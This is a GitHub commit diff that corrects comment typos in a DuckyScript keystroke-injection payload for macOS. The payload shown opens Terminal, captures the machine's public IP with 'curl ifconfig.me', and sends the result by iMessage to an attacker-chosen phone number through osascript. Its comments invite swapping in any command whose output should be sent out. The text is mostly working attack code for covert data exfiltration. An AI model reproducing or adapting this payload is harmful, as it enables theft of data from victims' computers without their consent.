Update payload.txt

Fixed spelling and grammar errors in the comments
pull/440/head
Matthew Kayne 2024-03-06 20:34:11 +00:00 committed by GitHub
parent bf2dfb7c17
commit 8bc5dd096c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions

View File

@ -13,12 +13,12 @@ STRING Terminal
DELAY 200
ENTER
DELAY 200
REM Change this command inside the brackets too any command that outputs text to the terminal
REM Change this command inside the brackets to any command that outputs text to the terminal
STRING x=$(curl ifconfig.me)
DELAY 200
ENTER
DELAY 200
REM Replace PHONE_NUMBER with you iMessage supported number (leave the @'s, they are required to run)
REM Replace PHONE_NUMBER with your iMessage supported number (leave the @'s, they are required to run)
STRING osascript -e 'tell application @Messages@ to send @'$x'@ to buddy @PHONE_NUMBER@'
DELAY 100
ENTER